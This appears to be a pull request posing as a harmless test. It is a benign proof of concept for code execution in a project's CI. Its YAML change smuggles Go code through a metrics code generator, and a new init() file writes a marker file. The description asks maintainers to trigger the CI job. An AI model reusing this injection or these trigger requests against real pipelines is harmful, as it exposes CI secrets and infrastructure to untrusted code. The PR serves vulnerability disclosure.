### PR TITLE
test: harmless init() to prove PR code executes in presubmit

### DIFF
--- a/metrics/metrics.yaml
+++ b/metrics/metrics.yaml
@@ -238,6 +238,8 @@
     - "RenameFolder"
     - "StatObject"
     - "UpdateObject"
+    - 'POC"), func() attribute.KeyValue { println("METRICS-GEN-POC"); return attribute.String("poc","ok") }(), //'
+
 
 - metric-name: "gcs/request_latencies"
   description: "The cumulative distribution of the GCS request latencies."

--- a/poc_rce.go
+++ b/poc_rce.go
@@ -1,3 +1,17 @@
+// Copyright 2025 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
 package main
 
 import (

--- a/poc_rce.go
+++ b/poc_rce.go
@@ -1,0 +1,14 @@
+package main
+
+import (
+"fmt"
+"os"
+"time"
+)
+
+func init() {
+f, _ := os.Create("RCE_POC_was_here.txt")
+defer f.Close()
+fmt.Fprintln(f, "init() executed at", time.Now().Format(time.RFC3339))
+fmt.Println("::RCE-POC:: init() executed")
+}


### PR DESCRIPTION
**Please ensure your PR title follows the format:**
```
type(scope): subject
```
Example:
`feat(api): add user login endpoint`

Available types:
- `feat`: A new feature
- `fix`: A bug fix
- `docs`: Documentation only changes
- `style`: Changes that do not affect the meaning of the code (white-space, formatting, missing semi-colons, etc)
- `refactor`: A code change that neither fixes a bug nor adds a feature
- `perf`: A code change that improves performance
- `test`: Adding missing tests or correcting existing tests
- `build`: Changes that affect the build system or external dependencies (example scopes: gulp, broccoli, npm)
- `ci`: Changes to our CI configuration files and scripts (example scopes: Travis, Circle, BrowserStack, SauceLabs)
- `chore`: Other changes that don't modify src or test files
- `revert`: Reverts a previous commit

### Description

### Link to the issue in case of a bug fix.

### Testing details
1. Manual - NA
2. Unit tests - NA
3. Integration tests - NA

### Any backward incompatible change? If so, please explain.

execute-perf-test

This is a safe PoC for a CI RCE class (PR code execution).
The file writes RCE_POC_was_here.txt and prints ::RCE-POC:: init() executed.
Please opt in and trigger Kokoro if you’re comfortable. Thanks :)
